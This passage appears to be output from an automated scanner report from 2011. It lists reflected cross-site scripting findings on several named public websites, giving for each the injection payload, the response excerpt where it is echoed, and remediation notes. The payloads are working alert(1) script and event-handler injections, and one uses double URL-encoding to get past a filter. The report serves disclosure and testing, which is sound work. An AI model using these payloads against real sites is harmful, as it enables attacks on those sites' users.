This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.0 400 Bad Request Set-Cookie: EUID=60673594-5bdb-11e0-864e-00000aac4907; expires=Wed, 26 Mar 2031 21:10:59 GMT; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMISESSION=60671ff0-5bdb-11e0-864e-00000aac4907:3479058659; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=95d30b207384bcbfd9e2501c504dfb10b5668d1216244db2440307c5ce40537c1e1ba1b2047ade3bfd2e753c256d5a4603d6f2929eda015f13405dcc455951ebd5b43153d0752c9fb668caa124d865df712cb0fdb1b1b3bc406b68e17f20dee187a13bdbaf3ee39132146371a9c46a33c9fe98266214abcae5c809050c0046e9ba27c03d98eba27e32d5c127d0ccf5d2d43ba86d12104fc4f95c7a263b003cec820178b15651ce56fba4b44769f70bd9d59c445ba94cba1fe1f5baf14572bce615577cbdd644c79f67b17bd132b3bf03efc75987f667fa1da0be77785a61afd02af37472f084e3f5ea17964f027c9197677f1074c1331c171eec25b4bda4b18d; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1159484509 Server: www.sciencedirect.com 9999 138.12.6.73:80 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- TRANS ...[SNIP]... <div class="errMsgText">Sorry, your request could not be processed because the qualifier of the URL (/favicon.ico30a56<a>43abf53a120) is incorrect. Please contact the Help Desk if the problem persists.</div> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b490'%3bdbd007d93b9 was submitted in the REST URL parameter 1. This input was echoed as 4b490';dbd007d93b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98ff2<img%20src%3da%20onerror%3dalert(1)>c9f80bac6da was submitted in the REST URL parameter 1. This input was echoed as 98ff2<img src=a onerror=alert(1)>c9f80bac6da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8945"><script>alert(1)</script>2ada341c7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d6d1<a>9b10da1fcf2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8fdc<script>alert(1)</script>178b6295e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e86b0<script>alert(1)</script>b83e4ef8d96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The page /inc/404.php?url=/favicon.icoe86b0<script>alert(1)</script>b83e4ef8d96 not found on songarea.com. It might have been removed, had its name changed, is temporarily unavailable.<br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6235"-alert(1)-"aff2b045367 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bacbe"><script>alert(1)</script>9092de6c01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33bc"><script>alert(1)</script>a51ed548431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f08b"-alert(1)-"494e1710a8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head> <ti ...[SNIP]... <script type="text/javascript"> // Note: it's important to keep these in separate script blocks COMSCORE.beacon({ c1: 2, c2: "6772046", c3: "", c4: "http://www.songmeanings.net/favicon.ico4f08b"-alert(1)-"494e1710a8a", // Replace this with the page URL that the site is on here, and also enter it into the <noscript> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0c1"><script>alert(1)</script>afc2cefb029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Content-Type: text/html;charset=utf-8 Cache-Control: max-age=1751 Date: Thu, 31 Mar 2011 20:14:04 GMT Connection: close Connection: Transfer-Encoding Vary: User-Agent Content-Length: 34871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea494"%3balert(1)//e6be00164d7 was submitted in the REST URL parameter 1. This input was echoed as ea494";alert(1)//e6be00164d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8148"><script>alert(1)</script>7ba47235182 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3c351--><script>alert(1)</script>439fc8ca87b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58eb'-alert(1)-'f27d99f6952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be7ae'%3b36893a9968e was submitted in the REST URL parameter 1. This input was echoed as be7ae';36893a9968e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec02b'><a>9afb3f07edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5687a'-alert(1)-'6b867f4e90c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c63b"><a>5bc279c610e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0337"><script>alert(1)</script>606da0c2b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af88"><script>alert(1)</script>7ea5153237d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e074c"><script>alert(1)</script>fe4046e2407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3bb6'%3be6d45b6e7b3 was submitted in the REST URL parameter 1. This input was echoed as f3bb6';e6d45b6e7b3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326ac"><script>alert(1)</script>0947f8fff2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5bb"><script>alert(1)</script>971346dceaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e68</script><script>alert(1)</script>52c8d116fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a99a3'-alert(1)-'7297c590a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82918'-alert(1)-'3627f2c27f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76d64"><script>alert(1)</script>f784c90cfda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcdfe"><script>alert(1)</script>1e0455e6feb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 391bc<script>alert(1)</script>9cb7311b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:42:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Content-Type: text/html; charset=ISO-8859-1 Content-Length: 9465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>File Not Found [UCLA ...[SNIP]... <strong>http://www.ucla.edu/favicon.ico391bc<script>alert(1)</script>9cb7311b8a3</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23567"%3balert(1)//7046d9ff590 was submitted in the REST URL parameter 1. This input was echoed as 23567";alert(1)//7046d9ff590 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 58760</script><script>alert(1)</script>a4574d79d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head>
<! ...[SNIP]... <SCRIPT type="text/javascript">
function go() { //alert("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script><script>alert(1)</script>a4574d79d82"); var URL= "https://vcuscc.synovate.com/uscellularfeedback/?URL=" + escape("http://10.205.186.40/uscellular/common/USCC404ErrorPage.jsp?path=/58760</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d889'-alert(1)-'81287e459cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839fc"><script>alert(1)</script>405c0c8ace0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79bce<script>alert(1)</script>56b22d8aaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:48:01 GMT Server: Apache Status: 404 X-RouteInfo: webhost1 Content-Type: text/html; charset=UTF-8 Content-Length: 9637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>The requested URL /favicon.ico79bce<script>alert(1)</script>56b22d8aaa6 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcef7"><script>alert(1)</script>b3410be2129 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3e2e<img%20src%3da%20onerror%3dalert(1)>c6a0e9a058d was submitted in the REST URL parameter 1. This input was echoed as c3e2e<img src=a onerror=alert(1)>c6a0e9a058d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<html> <head><title>URL Not Found</title></head> <body> <h1>URL Not Found</h1> <b>http://www.washington.edu/favicon.icoc3e2e<img src=a onerror=alert(1)>c6a0e9a058d</b> was not found or is no lon ...[SNIP]... <br> Reason: File does not exist: /www/world/favicon.icoc3e2e<img src=a onerror=alert(1)>c6a0e9a058d.</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee44c'%3b15cff5da24b was submitted in the REST URL parameter 1. This input was echoed as ee44c';15cff5da24b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad5f"><a>0eafcc39315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d918--><script>alert(1)</script>64bc46b88f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0e7<script>alert(1)</script>34ae1aa9b81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dfe"><script>alert(1)</script>ca989a076a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc06'-alert(1)-'692e4a8f43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a153<img%20src%3da%20onerror%3dalert(1)>ff635e63587 was submitted in the REST URL parameter 1. This input was echoed as 4a153<img src=a onerror=alert(1)>ff635e63587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1be0</script><a>54a64c5c83c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18a8f<img%20src%3da%20onerror%3dalert(1)>22617b15004 was submitted in the REST URL parameter 1. This input was echoed as 18a8f<img src=a onerror=alert(1)>22617b15004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb2c"><script>alert(1)</script>1c6fa125c77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a21"-alert(1)-"3be45c8108 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3edd0"style%3d"x%3aexpression(alert(1))"e9e7c857e46 was submitted in the REST URL parameter 1. This input was echoed as 3edd0"style="x:expression(alert(1))"e9e7c857e46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head><title>301 Moved Permanently</title></head><body> <script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/comm ...[SNIP]... <a href="http://azstarnet.com/3edd0"style="x:expression(alert(1))"e9e7c857e46/"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3c84'%3b52a57e4836 was submitted in the REST URL parameter 1. This input was echoed as b3c84';52a57e4836 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www2.canada.com/b3c84';52a57e4836/index.html Content-Type: text/html; charset=utf-8 Expires: Thu, 31 Mar 2011 20:33:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 31 Mar 2011 20:33:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 3573
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www2.canada.com/b3c84';52a57e4836/index.html">here</a>.</h2> </body></html> <form name="frmPage" method="pos ...[SNIP]... - /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName='/canada/www.canada.com/b3c84';52a57e4836/index.html'; s.server=window.location.hostname.toLowerCase(); s.channel='Canada'; s.pageType=''; s.p ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d74c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0866578095 was submitted in the REST URL parameter 1. This input was echoed as 1d74c"><script>alert(1)</script>a0866578095 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 302 Object moved Connection: close Date: Thu, 31 Mar 2011 21:59:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Length: 197 Location: http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095 Cache-Control: private Content-Type: text/html
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico1d74c"><script>alert(1)</script>a0866578095">here</a>.</body>
1.156. http://www.searchwarp.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.searchwarp.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4961c"><script>alert(1)</script>13e487883c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
